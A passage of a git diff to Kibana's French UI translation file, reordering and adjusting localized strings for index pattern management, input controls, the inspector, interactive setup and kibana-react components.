Pour corriger ce problème, vous devrez réindexer vos données.", "indexPatternManagement.editIndexPattern.scripted.addFieldButton": "Ajouter un champ scripté", "indexPatternManagement.editIndexPattern.scripted.deleteField.cancelButton": "Annuler", "indexPatternManagement.editIndexPattern.scripted.deleteField.deleteButton": "Supprimer", - "indexPatternManagement.editIndexPattern.scripted.deleteFieldLabel": "Supprimer le champ scripté \"{fieldName}\" ?", + "indexPatternManagement.editIndexPattern.scripted.deleteFieldLabel": "Supprimer le champ scripté \"{fieldName}\" ?", "indexPatternManagement.editIndexPattern.scripted.deprecationLangHeader": "Langages déclassés en cours d'utilisation", - "indexPatternManagement.editIndexPattern.scripted.deprecationLangLabel.deprecationLangDetail": "Les langages déclassés suivants sont en cours d'utilisation : {deprecatedLangsInUse}. La prise en charge de ces langages sera supprimée dans la prochaine version majeure de Kibana et d'Elasticsearch. Convertissez vos champs scriptés en {link} pour éviter tout problème.", "indexPatternManagement.editIndexPattern.scripted.deprecationLangLabel.painlessDescription": "Painless", "indexPatternManagement.editIndexPattern.scripted.newFieldPlaceholder": "Nouveau champ scripté", "indexPatternManagement.editIndexPattern.scripted.table.deleteDescription": "Supprimer ce champ", 
@@ -4935,7 +4089,7 @@
 "indexPatternManagement.editIndexPattern.source.addButtonLabel": "Ajouter",
 "indexPatternManagement.editIndexPattern.source.deleteFilter.cancelButtonLabel": "Annuler",
 "indexPatternManagement.editIndexPattern.source.deleteFilter.deleteButtonLabel": "Supprimer",
- "indexPatternManagement.editIndexPattern.source.deleteSourceFilterLabel": "Supprimer le filtre de champ \"{value}\" ?",
+ "indexPatternManagement.editIndexPattern.source.deleteSourceFilterLabel": "Supprimer le filtre de champ \"{value}\" ?",
 "indexPatternManagement.editIndexPattern.source.noteLabel": "Notez que les champs multiples apparaîtront incorrectement comme des correspondances dans le tableau ci-dessous. Ces filtres ne s'appliquent qu'aux champs dans le document source d'origine. Par conséquent, les champs multiples ne sont pas réellement filtrés.",
 "indexPatternManagement.editIndexPattern.source.table.cancelAria": "Annuler",
 "indexPatternManagement.editIndexPattern.source.table.deleteAria": "Supprimer",
@@ -4949,9 +4103,9 @@
 "indexPatternManagement.editIndexPattern.sourceLabel": "Les filtres de champ peuvent être utilisés pour exclure un ou plusieurs champs lors de la récupération d'un document. Cela se produit lors de l'affichage d'un document dans l'application Discover ou avec un tableau affichant les résultats d'une recherche enregistrée dans l'application Dashboard. Si vous avez des documents avec des champs de grande taille ou peu importants, il pourrait être utile de filtrer ces champs à ce niveau plus bas.",
 "indexPatternManagement.editIndexPattern.sourcePlaceholder": "filtre de champ, accepte les caractères génériques (par ex. \"utilisateur*\" pour filtrer les champs commençant par \"utilisateur\")",
 "indexPatternManagement.editIndexPattern.tabs.fieldsHeader": "Champs",
- "indexPatternManagement.editIndexPattern.tabs.relationshipsHeader": "Relations ({count})",
 "indexPatternManagement.editIndexPattern.tabs.scriptedHeader": "Champs scriptés",
 "indexPatternManagement.editIndexPattern.tabs.sourceHeader": "Filtres de champ",
+ "indexPatternManagement.editIndexPattern.timeFilterHeading": "Champ temporel :",
 "indexPatternManagement.fieldTypeConflict": "Conflit de type de champ",
 "indexPatternManagement.formatHeader": "Format",
 "indexPatternManagement.formatLabel": "Le formatage détermine la façon dont les valeurs sont affichées. La modification de ce paramètre peut également affecter la valeur du champ et la mise en surbrillance dans Discover.",
@@ -4962,10 +4116,9 @@
 "indexPatternManagement.indexPatternTable.badge.securityDataViewTitle": "Vue de données Security",
 "indexPatternManagement.indexPatternTable.savedObjectName": "vue de données",
 "indexPatternManagement.labelHelpText": "Définissez une étiquette personnalisée à utiliser lorsque ce champ est affiché dans Discover, Maps et Visualize. Actuellement, les requêtes et les filtres ne prennent pas en charge les étiquettes personnalisées et utilisent le nom d'origine des champs.",
- "indexPatternManagement.languageLabel": "Langage",
- "indexPatternManagement.mappingConflictLabel.mappingConflictDetail": "{mappingConflict} Vous avez déjà un champ nommé {fieldName}. Si vous donnez le même nom à votre champ scripté, vous ne pourrez pas interroger les deux champs en même temps.",
- "indexPatternManagement.mappingConflictLabel.mappingConflictLabel": "Conflit de mapping :",
- "indexPatternManagement.multiTypeLabelDesc": "Le type de ce champ varie selon les index. Il n'est pas disponible pour de nombreuses fonctions d'analyse. Les index par type sont les suivants :",
+ "indexPatternManagement.languageLabel": "Langue",
+ "indexPatternManagement.mappingConflictLabel.mappingConflictLabel": "Conflit de mapping :",
+ "indexPatternManagement.multiTypeLabelDesc": "Le type de ce champ varie selon les index. Il n'est pas disponible pour de nombreuses fonctions d'analyse. Les index par type sont les suivants :",
 "indexPatternManagement.nameErrorMessage": "Nom obligatoire",
 "indexPatternManagement.nameLabel": "Nom",
 "indexPatternManagement.namePlaceholder": "Nouveau champ scripté",
@@ -4975,9 +4128,7 @@
 "indexPatternManagement.objectsTable.relationships.columnTypeName": "Type",
 "indexPatternManagement.objectsTable.relationships.search.filters.type.name": "Type",
 "indexPatternManagement.popularityLabel": "Popularité",
- "indexPatternManagement.script.accessWithLabel": "Accédez aux champs avec {code}.",
 "indexPatternManagement.script.getHelpLabel": "Obtenez de l'aide pour la syntaxe et prévisualisez les résultats de votre script.",
- "indexPatternManagement.scriptedFieldsDeprecatedBody": "Pour profiter de plus de flexibilité et de la prise en charge des scripts Painless, utilisez {runtimeDocs}.",
 "indexPatternManagement.scriptedFieldsDeprecatedTitle": "Les champs scriptés sont déclassés.",
 "indexPatternManagement.scriptingLanguages.errorFetchingToastDescription": "Erreur lors de l'obtention des langages de script disponibles à partir d'Elasticsearch",
 "indexPatternManagement.scriptInvalidErrorMessage": "Script non valide. Voir l'aperçu du script pour plus de détails.",
@@ -4986,46 +4137,35 @@ "indexPatternManagement.scriptRequiredErrorMessage": "Script obligatoire", "indexPatternManagement.starCharacterNotAllowedValidationErrorMessage": "Le nom du champ ne peut pas contenir *.", "indexPatternManagement.syntax.default.formatLabel": "doc['some_field'].value", - "indexPatternManagement.syntax.defaultLabel.defaultDetail": "Par défaut, les champs scriptés Kibana emploient {painless}, un langage de script simple et sécurisé spécialement conçu pour Elasticsearch. Pour accéder aux valeurs du document, utilisez le format suivant :", "indexPatternManagement.syntax.defaultLabel.painlessLink": "Painless", "indexPatternManagement.syntax.kibanaLabel": "Kibana impose actuellement une limitation spéciale sur les scripts Painless. Ils ne peuvent pas contenir de fonctions nommées.", - "indexPatternManagement.syntax.lucene.commonLabel.commonDetail": "Vous venez d'une ancienne version de Kibana ? Les expressions {lucene} que vous connaissez et adorez sont toujours disponibles. 
Les expressions Lucene ressemblent beaucoup à du JavaScript, mais elles se limitent aux opérations arithmétiques de base, aux opérations au niveau du bit et aux opérations de comparaison.", "indexPatternManagement.syntax.lucene.commonLabel.luceneLink": "Expressions Lucene", "indexPatternManagement.syntax.lucene.limits.fieldsLabel": "Les champs stockés ne sont pas disponibles.", - "indexPatternManagement.syntax.lucene.limits.sparseLabel": "Si un champ est clairsemé (seuls certains documents contiennent une valeur), les documents où ce champ est vide auront une valeur de 0.", + "indexPatternManagement.syntax.lucene.limits.sparseLabel": "Si un champ est clairsemé (seuls certains documents contiennent une valeur), les documents où ce champ est vide auront une valeur de 0.", "indexPatternManagement.syntax.lucene.limits.typesLabel": "Seuls les champs numériques, booléens, de date et de point géographique sont accessibles.", - "indexPatternManagement.syntax.lucene.limitsLabel": "L'utilisation d’expressions Lucene implique quelques limitations :", - "indexPatternManagement.syntax.lucene.operations.arithmeticLabel": "Opérateurs arithmétiques : {operators}", - "indexPatternManagement.syntax.lucene.operations.bitwiseLabel": "Opérateurs au niveau du bit : {operators}", - "indexPatternManagement.syntax.lucene.operations.booleanLabel": "Opérateurs booléens (y compris l'opérateur ternaire) : {operators}", - "indexPatternManagement.syntax.lucene.operations.comparisonLabel": "Opérateurs de comparaison : {operators}", - "indexPatternManagement.syntax.lucene.operations.distanceLabel": "Fonctions de distance : {operators}", - "indexPatternManagement.syntax.lucene.operations.mathLabel": "Fonctions mathématiques communes : {operators}", - "indexPatternManagement.syntax.lucene.operations.miscellaneousLabel": "Fonctions diverses : {operators}", - "indexPatternManagement.syntax.lucene.operations.trigLabel": "Fonctions de bibliothèque trigonométrique : {operators}", - 
"indexPatternManagement.syntax.lucene.operationsLabel": "Voici toutes les opérations disponibles pour les expressions Lucene :", - "indexPatternManagement.syntax.painlessLabel.javaAPIsLink": "API Java natives", - "indexPatternManagement.syntax.painlessLabel.painlessDetail": "Painless est un langage puissant, mais facile à utiliser. Il donne accès à de nombreuses {javaAPIs}. Lisez-en plus sur sa {syntax} et découvrez tout ce que vous devez savoir en un rien de temps !", + "indexPatternManagement.syntax.lucene.limitsLabel": "L'utilisation d’expressions Lucene implique quelques limitations :", + "indexPatternManagement.syntax.lucene.operationsLabel": "Voici toutes les opérations disponibles pour les expressions Lucene :", + "indexPatternManagement.syntax.painlessLabel.javaAPIsLink": "API Java natives", "indexPatternManagement.syntax.painlessLabel.syntaxLink": "syntaxe", "indexPatternManagement.syntaxHeader": "Syntaxe", "indexPatternManagement.testScript.errorMessage": "Votre script présente une erreur.", "indexPatternManagement.testScript.fieldsLabel": "Champs supplémentaires", "indexPatternManagement.testScript.fieldsPlaceholder": "Sélectionner…", - "indexPatternManagement.testScript.instructions": "Exécutez votre script pour prévisualiser les 10 premiers résultats. Vous pouvez également sélectionner des champs supplémentaires à inclure dans les résultats pour obtenir plus de contexte ou ajouter une requête pour filtrer des documents spécifiques.", - "indexPatternManagement.testScript.resultsLabel": "10 premiers résultats", + "indexPatternManagement.testScript.instructions": "Exécutez votre script pour prévisualiser les 10 premiers résultats. 
Vous pouvez également sélectionner des champs supplémentaires à inclure dans les résultats pour obtenir plus de contexte ou ajouter une requête pour filtrer des documents spécifiques.", + "indexPatternManagement.testScript.resultsLabel": "10 premiers résultats", "indexPatternManagement.testScript.resultsTitle": "Prévisualiser les résultats", "indexPatternManagement.testScript.submitButtonLabel": "Exécuter le script", "indexPatternManagement.typeLabel": "Type", - "indexPatternManagement.warningCallOutLabel.callOutDetail": "Familiarisez-vous avec les {scripFields} et les {scriptsInAggregation} avant d'utiliser cette fonctionnalité. Les champs scriptés peuvent être utilisés pour afficher et agréger les valeurs calculées. Dès lors, ils peuvent être très lents et, s'ils ne sont pas faits correctement, ils peuvent rendre Kibana inutilisable.", "indexPatternManagement.warningCallOutLabel.runtimeLink": "champs d'exécution", "indexPatternManagement.warningCallOutLabel.scripFieldsLink": "champs scriptés", "indexPatternManagement.warningCallOutLabel.scriptsInAggregationLink": "scripts en agrégations", - "indexPatternManagement.warningHeader": "Avertissement de déclassement :", + "indexPatternManagement.warningHeader": "Avertissement de déclassement :", "indexPatternManagement.warningLabel.painlessLinkLabel": "Painless", - "indexPatternManagement.warningLabel.warningDetail": "{language} est déclassé et ne sera plus pris en charge dans la prochaine version majeure de Kibana et d'Elasticsearch. 
Nous recommandons d'utiliser {painlessLink} pour les nouveaux champs scriptés.", - "inputControl.control.noIndexPatternTooltip": "Impossible de localiser l'ID du modèle d'indexation : {indexPatternId}.", - "inputControl.control.notInitializedTooltip": "Le contrôle n'a pas été initialisé.", + "inputControl.control.noIndexPatternTooltip": "Impossible de localiser l'ID du modèle d'indexation : {indexPatternId}.", "inputControl.control.noValuesDisableTooltip": "Le filtrage se produit sur le champ \"{fieldName}\", qui n'existe dans aucun document du modèle d'indexation \"{indexPatternName}\". Sélectionnez un champ différent ou des documents d'index qui contiennent des valeurs pour ce champ.", + "inputControl.listControl.unableToFetchTooltip": "Impossible de récupérer les termes. Erreur : {errorMessage}.", + "inputControl.rangeControl.unableToFetchTooltip": "Impossible de récupérer les valeurs min. et max. de la plage. Erreur : {errorMessage}.", + "inputControl.control.notInitializedTooltip": "Le contrôle n'a pas été initialisé.", "inputControl.editor.controlEditor.controlLabel": "Contrôler l'étiquette", "inputControl.editor.controlEditor.moveControlDownAriaLabel": "Abaisser le contrôle", "inputControl.editor.controlEditor.moveControlUpAriaLabel": "Remonter le contrôle", 
@@ -5055,8 +4195,6 @@ "inputControl.editor.rangeControl.stepSizeLabel": "Taille de l'étape", "inputControl.function.help": "Visualisation du contrôle d'entrée", "inputControl.listControl.disableTooltip": "Désactivé jusqu'à ce que \"{label}\" soit défini.", - "inputControl.listControl.unableToFetchTooltip": "Impossible de récupérer les termes. Erreur : {errorMessage}.", - "inputControl.rangeControl.unableToFetchTooltip": "Impossible de récupérer les valeurs min. et max. de la plage. Erreur : {errorMessage}.", "inputControl.register.controlsDescription": "Les contrôles d'entrée sont déclassés et seront supprimés dans une prochaine version.", "inputControl.register.controlsTitle": "Contrôles d'entrée", "inputControl.register.tabs.controlsTitle": "Contrôles", @@ -5067,6 +4205,11 @@ "inputControl.vis.listControl.partialResultsWarningMessage": "La liste des termes peut être incomplète, car la requête prend trop de temps. Ajustez les paramètres de saisie semi-automatique dans le fichier kibana.yml pour obtenir des résultats complets.", "inputControl.vis.listControl.selectPlaceholder": "Sélectionner…", "inputControl.vis.listControl.selectTextPlaceholder": "Sélectionner…", + "inspector.requests.requestTimeLabel": "{requestTime} ms", + "inspector.requests.requestWasMadeDescription": "{requestsCount, plural, one {# requête a été effectuée} other {# requêtes ont été effectuées} }{failedRequests}", + "inspector.requests.requestWasMadeDescription.requestHadFailureText": ", {failedCount} a/ont échoué.", + "inspector.requests.searchSessionId": "ID de la session de recherche : {searchSessionId}", + "inspector.view": "Vue : {viewName}", "inspector.closeButton": "Fermer l'inspecteur", "inspector.reqTimestampDescription": "Heure de début de la requête", "inspector.reqTimestampKey": "Horodatage de la requête", 
@@ -5077,38 +4220,42 @@ "inspector.requests.noRequestsLoggedDescription.whatDoesItUsuallyMeanText": "Cela signifie généralement qu'il n'était pas nécessaire de récupérer des données ou que l'élément n'a pas encore commencé à récupérer des données.", "inspector.requests.noRequestsLoggedTitle": "Aucune requête consignée", "inspector.requests.openInConsoleLabel": "Ouvrir dans la console", - "inspector.requests.openInSearchProfilerLabel": "Ouvrir dans Search Profiler", + "inspector.requests.openInSearchProfilerLabel": "Ouvrir dans Search Profiler", "inspector.requests.requestFailedTooltipTitle": "Échec de la requête", "inspector.requests.requestInProgressAriaLabel": "Requête en cours", "inspector.requests.requestsDescriptionTooltip": "Afficher les requêtes de recherche utilisées pour collecter les données", "inspector.requests.requestsTitle": "Requêtes", "inspector.requests.requestSucceededTooltipTitle": "Requête réussie", "inspector.requests.requestTabLabel": "Requête", - "inspector.requests.requestTimeLabel": "{requestTime} ms", "inspector.requests.requestTooltipDescription": "Durée totale qu'a nécessité la requête.", - "inspector.requests.requestWasMadeDescription": "{requestsCount, plural, one {# requête a été effectuée} other {# requêtes ont été effectuées} }{failedRequests}", - "inspector.requests.requestWasMadeDescription.requestHadFailureText": ", {failedCount} a/ont échoué.", "inspector.requests.responseTabLabel": "Réponse", - "inspector.requests.searchSessionId": "ID de la session de recherche : {searchSessionId}", "inspector.requests.statisticsTabLabel": "Statistiques", "inspector.title": "Inspecteur", - "inspector.view": "Vue : {viewName}", + "interactiveSetup.certificatePanel.fingerprint": "Empreinte digitale (SHA-256) : {fingerprint}", + "interactiveSetup.certificatePanel.issuer": "Émis par : {issuer}", + "interactiveSetup.certificatePanel.validFrom": "Émis le : {validFrom}", + "interactiveSetup.certificatePanel.validTo": "Expire le : {validTo}", + 
"interactiveSetup.clusterAddressForm.submitButton": "{isSubmitting, select, true{Vérification de l'adresse…} other{Vérifier l'adresse}}", + "interactiveSetup.clusterConfigurationForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", + "interactiveSetup.enrollmentTokenForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", + "interactiveSetup.forgotPasswordPopover.helpText": "Pour réinitialiser le mot de passe de l'utilisateur {username}, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", + "interactiveSetup.singleCharsField.digitLabel": "Chiffre {index}", + "interactiveSetup.submitErrorCallout.compatibilityFailureErrorDescription": "Le cluster Elasticsearch (v{elasticsearchVersion}) est incompatible avec cette version de Kibana (v{kibanaVersion}).", + "interactiveSetup.submitErrorCallout.kibanaConfigFailureErrorDescription": "Réessayez ou mettez à jour le fichier {config} manuellement.", + "interactiveSetup.submitErrorCallout.kibanaConfigNotWritableErrorDescription": "Vérifiez les autorisations du fichier et assurez-vous que {config} peut être écrit par le processus Kibana.", + "interactiveSetup.verificationCodeForm.codeDescription": "Copiez le code à partir du serveur Kibana ou exécutez {command} pour le récupérer.", + "interactiveSetup.verificationCodeForm.submitButton": "{isSubmitting, select, true{Vérification…} other{Vérifier}}", "interactiveSetup.app.notReady": "Le serveur Kibana n’est pas encore prêt.", "interactiveSetup.app.pageTitle": "Configurez Elastic pour commencer", "interactiveSetup.certificateChain.cancelButton": "Fermer", "interactiveSetup.certificateChain.title": "Chaîne de certificat", - "interactiveSetup.certificatePanel.fingerprint": "Empreinte digitale (SHA-256) : {fingerprint}", "interactiveSetup.certificatePanel.intermediateCertificateAuthority": "CA intermédiaire", - "interactiveSetup.certificatePanel.issuer": 
"Émis par : {issuer}", "interactiveSetup.certificatePanel.rootCertificateAuthority": "CA racine", "interactiveSetup.certificatePanel.serverCertificate": "Certificat de serveur", - "interactiveSetup.certificatePanel.validFrom": "Émis le : {validFrom}", - "interactiveSetup.certificatePanel.validTo": "Expire le : {validTo}", "interactiveSetup.clusterAddressForm.cancelButton": "Retour", "interactiveSetup.clusterAddressForm.hostInvalidError": "Saisissez une adresse valide, avec \"http\" ou \"https\".", "interactiveSetup.clusterAddressForm.hostLabel": "Adresse", "interactiveSetup.clusterAddressForm.hostRequiredError": "Entrez une adresse.", - "interactiveSetup.clusterAddressForm.submitButton": "{isSubmitting, select, true{Vérification de l'adresse…} other{Vérifier l'adresse}}", "interactiveSetup.clusterAddressForm.submitErrorTitle": "Vérification de l'adresse impossible", "interactiveSetup.clusterConfigurationForm.caCertConfirmationRequiredError": "Confirmez que vous reconnaissez ce certificat et que vous lui faites confiance.", "interactiveSetup.clusterConfigurationForm.caCertLabel": "Autorité de certificat", 
@@ -5119,45 +4266,36 @@ "interactiveSetup.clusterConfigurationForm.insecureClusterTitle": "Ce cluster n’est pas sécurisé", "interactiveSetup.clusterConfigurationForm.passwordLabel": "Mot de passe", "interactiveSetup.clusterConfigurationForm.passwordRequiredError": "Entrez un mot de passe.", - "interactiveSetup.clusterConfigurationForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", "interactiveSetup.clusterConfigurationForm.submitErrorTitle": "Configuration d'Elastic impossible", - "interactiveSetup.clusterConfigurationForm.trustCaCertLabel": "Je reconnais ce certificat et je lui fais confiance :", + "interactiveSetup.clusterConfigurationForm.trustCaCertLabel": "Je reconnais ce certificat et je lui fais confiance :", "interactiveSetup.clusterConfigurationForm.usernameLabel": "Nom d'utilisateur", "interactiveSetup.clusterConfigurationForm.usernameRequiredError": "Entrez un nom d'utilisateur.", "interactiveSetup.clusterConfigurationForm.usernameReservedError": "l'utilisateur \"elastic\" ne peut pas être utilisé en tant qu’utilisateur système Kibana.", "interactiveSetup.enrollmentTokenDetails.connectTo": "Se connecter à", "interactiveSetup.enrollmentTokenForm.cancelButton": "Configurer manuellement", - "interactiveSetup.enrollmentTokenForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", "interactiveSetup.enrollmentTokenForm.submitErrorTitle": "Configuration d'Elastic impossible", "interactiveSetup.enrollmentTokenForm.tokenInvalidError": "Entrez un jeton d'enregistrement valide.", "interactiveSetup.enrollmentTokenForm.tokenLabel": "Jeton d'enregistrement", "interactiveSetup.enrollmentTokenForm.tokenPlaceholder": "Collez le jeton d'enregistrement à partir du terminal.", "interactiveSetup.enrollmentTokenForm.tokenRequiredError": "Entrez un jeton d'enregistrement.", - "interactiveSetup.enrollmentTokenHelpPopover.buttonText": "Où puis-je le trouver ?", - 
"interactiveSetup.enrollmentTokenHelpPopover.commandHelpText": "Pour générer un nouveau jeton d'enregistrement, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", + "interactiveSetup.enrollmentTokenHelpPopover.buttonText": "Où puis-je le trouver ?", + "interactiveSetup.enrollmentTokenHelpPopover.commandHelpText": "Pour générer un nouveau jeton d'enregistrement, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", "interactiveSetup.enrollmentTokenHelpPopover.docLinkText": "Découvrez comment configurer Elastic.", "interactiveSetup.enrollmentTokenHelpPopover.helpText": "Le jeton d'enregistrement est automatiquement généré lorsque vous démarrez Elasticsearch pour la première fois. Vous devrez peut-être faire défiler la vue du terminal en arrière pour l'afficher.", - "interactiveSetup.forgotPasswordPopover.buttonText": "Mot de passe oublié ?", - "interactiveSetup.forgotPasswordPopover.helpText": "Pour réinitialiser le mot de passe de l'utilisateur {username}, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", + "interactiveSetup.forgotPasswordPopover.buttonText": "Mot de passe oublié ?", "interactiveSetup.progressIndicator.completeStepTitle": "Achèvement de la configuration", "interactiveSetup.progressIndicator.prebootStepTitle": "Enregistrement des paramètres", "interactiveSetup.progressIndicator.unavailableStepTitle": "Démarrage d'Elastic", - "interactiveSetup.singleCharsField.digitLabel": "Chiffre {index}", - "interactiveSetup.submitErrorCallout.compatibilityFailureErrorDescription": "Le cluster Elasticsearch (v{elasticsearchVersion}) est incompatible avec cette version de Kibana (v{kibanaVersion}).", "interactiveSetup.submitErrorCallout.elasticsearchConnectionConfiguredErrorTitle": "Elastic est déjà configuré", "interactiveSetup.submitErrorCallout.elasticsearchConnectionConfiguredSubmitButton": "Continuer vers Kibana", 
"interactiveSetup.submitErrorCallout.EnrollFailureErrorDescription": "Générez un nouveau jeton d'enregistrement ou configurez-le manuellement.", "interactiveSetup.submitErrorCallout.forbiddenErrorDescription": "Réessayez de configurer Elastic.", "interactiveSetup.submitErrorCallout.forbiddenErrorTitle": "Vérification requise", - "interactiveSetup.submitErrorCallout.kibanaConfigFailureErrorDescription": "Réessayez ou mettez à jour le fichier {config} manuellement.", - "interactiveSetup.submitErrorCallout.kibanaConfigNotWritableErrorDescription": "Vérifiez les autorisations du fichier et assurez-vous que {config} peut être écrit par le processus Kibana.", "interactiveSetup.submitErrorCallout.kibanaConfigNotWritableErrorTitle": "Écriture impossible dans le fichier de configuration", "interactiveSetup.submitErrorCallout.pingFailureErrorDescription": "Vérifiez l'adresse et réessayez.", "interactiveSetup.submitErrorCallout.pingFailureErrorTitle": "Connexion au cluster impossible", - "interactiveSetup.verificationCodeForm.codeDescription": "Copiez le code à partir du serveur Kibana ou exécutez {command} pour le récupérer.", "interactiveSetup.verificationCodeForm.codeMinLengthError": "Entrez les six chiffres.", "interactiveSetup.verificationCodeForm.codeRequiredError": "Entrez le code de vérification à partir du serveur Kibana.", - "interactiveSetup.verificationCodeForm.submitButton": "{isSubmitting, select, true{Vérification…} other{Vérifier}}", "interactiveSetup.verificationCodeForm.submitErrorTitle": "Vérification du code impossible", "interactiveSetup.verificationCodeForm.title": "Vérification requise", "kbnConfig.deprecations.conflictSetting.manualStepOneMessage": "Assurez-vous que \"{fullNewPath}\" contient la valeur correcte dans le fichier de configuration, l'indicateur CLI ou la variable d'environnement (dans Docker uniquement).", 
@@ -5170,15 +4308,32 @@ "kbnConfig.deprecations.replacedSettingMessage": "Le paramètre \"{fullOldPath}\" a été remplacé par \"{fullNewPath}\".", "kbnConfig.deprecations.unusedSetting.manualStepOneMessage": "Retirez \"{fullPath}\" dans le fichier de configuration Kibana, l'indicateur CLI ou la variable d'environnement (dans Docker uniquement).", "kbnConfig.deprecations.unusedSettingMessage": "Vous n’avez plus besoin de configurer \"{fullPath}\".", + "kibana_utils.stateManagement.stateHash.unableToStoreHistoryInSessionErrorMessage": "Kibana n'est pas en mesure de stocker des éléments d'historique dans votre session, car le stockage est arrivé à saturation et il ne semble pas y avoir d'éléments pouvant être supprimés sans risque.\n\nCe problème peut généralement être corrigé en passant à un nouvel onglet, mais il peut être causé par un problème plus important. Si ce message s'affiche régulièrement, veuillez nous en faire part sur {gitHubIssuesUrl}.", "kibana_utils.history.savedObjectIsMissingNotificationMessage": "L'objet enregistré est manquant.", "kibana_utils.stateManagement.stateHash.unableToRestoreUrlErrorMessage": "Impossible de restaurer complètement l'URL. Assurez-vous d'utiliser la fonctionnalité de partage.", - "kibana_utils.stateManagement.stateHash.unableToStoreHistoryInSessionErrorMessage": "Kibana n'est pas en mesure de stocker des éléments d'historique dans votre session, car le stockage est arrivé à saturation et il ne semble pas y avoir d'éléments pouvant être supprimés sans risque.\n\nCe problème peut généralement être corrigé en passant à un nouvel onglet, mais il peut être causé par un problème plus important. 
Si ce message s'affiche régulièrement, veuillez nous en faire part sur {gitHubIssuesUrl}.", "kibana_utils.stateManagement.url.restoreUrlErrorTitle": "Erreur lors de la restauration de l'état depuis l'URL.", "kibana_utils.stateManagement.url.saveStateInUrlErrorTitle": "Erreur lors de l'enregistrement de l'état dans l'URL.", + "kibana-react.dualRangeControl.outsideOfRangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", + "kibana-react.kibanaCodeEditor.startEditing": "Appuyez sur {key} pour modifier.", + "kibana-react.kibanaCodeEditor.startEditingReadOnly": "Appuyez sur {key} pour interagir avec le code.", + "kibana-react.kibanaCodeEditor.stopEditing": "Appuyez sur {key} pour arrêter la modification.", + "kibana-react.kibanaCodeEditor.stopEditingReadOnly": "Appuyez sur {key} pour arrêter l'interaction.", + "kibana-react.noDataPage.cantDecide": "Vous ne savez pas quoi utiliser ? {link}", + "kibana-react.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.", + "kibana-react.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.", + "kibana-react.solutionNav.mobileTitleText": "Menu {solutionName}", + "kibana-react.tableListView.listing.createNewItemButtonLabel": "Créer {entityName}", + "kibana-react.tableListView.listing.deleteButtonMessage": "Supprimer {itemCount} {entityName}", + "kibana-react.tableListView.listing.deleteConfirmModalDescription": "Vous ne pourrez pas récupérer les {entityNamePlural} supprimés.", + "kibana-react.tableListView.listing.deleteSelectedConfirmModal.title": "Supprimer {itemCount} {entityName} ?", + "kibana-react.tableListView.listing.fetchErrorDescription": "Le listing {entityName} n'a pas pu être récupéré : {message}.", + "kibana-react.tableListView.listing.listingLimitExceededDescription": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. 
Vous pouvez modifier ce paramètre sous {advancedSettingsLink}.", + "kibana-react.tableListView.listing.listingLimitExceededDescriptionNoPermissions": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Contactez l'administrateur système pour modifier ce paramètre.", + "kibana-react.tableListView.listing.table.editActionName": "Modifier {itemDescription}", + "kibana-react.tableListView.listing.unableToDeleteDangerMessage": "Impossible de supprimer la/le/les {entityName}(s)", "kibana-react.dualRangeControl.maxInputAriaLabel": "Maximum de la plage", "kibana-react.dualRangeControl.minInputAriaLabel": "Minimum de la plage", "kibana-react.dualRangeControl.mustSetBothErrorMessage": "Les valeurs inférieure et supérieure doivent être définies.", - "kibana-react.dualRangeControl.outsideOfRangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", "kibana-react.dualRangeControl.upperValidErrorMessage": "La valeur supérieure doit être supérieure ou égale à la valeur inférieure.", "kibana-react.exitFullScreenButton.exitFullScreenModeButtonAriaLabel": "Quitter le mode Plein écran", "kibana-react.exitFullScreenButton.exitFullScreenModeButtonText": "Quitter le plein écran", 
@@ -5189,67 +4344,32 @@ "kibana-react.kibanaCodeEditor.ariaLabel": "Éditeur de code", "kibana-react.kibanaCodeEditor.enterKeyLabel": "Entrée", "kibana-react.kibanaCodeEditor.escapeKeyLabel": "Échap", - "kibana-react.kibanaCodeEditor.startEditing": "Appuyez sur {key} pour modifier.", - "kibana-react.kibanaCodeEditor.startEditingReadOnly": "Appuyez sur {key} pour interagir avec le code.", - "kibana-react.kibanaCodeEditor.stopEditing": "Appuyez sur {key} pour arrêter la modification.", - "kibana-react.kibanaCodeEditor.stopEditingReadOnly": "Appuyez sur {key} pour arrêter l'interaction.", "kibana-react.mountPointPortal.errorMessage": "Erreur lors du rendu du contenu du portail.", - "kibana-react.noDataPage.cantDecide": "Vous ne savez pas quoi utiliser ? {link}", "kibana-react.noDataPage.cantDecide.link": "Consultez la documentation pour en savoir plus.", - "kibana-react.noDataPage.elasticAgentCard.description": "Utilisez Elastic Agent pour collecter de manière simple et unifiée les données de vos machines.", + "kibana-react.noDataPage.elasticAgentCard.description": "Utilisez Elastic Agent pour collecter de manière simple et unifiée les données de vos machines.", "kibana-react.noDataPage.elasticAgentCard.noPermission.description": "Cette intégration n'est pas encore activée. 
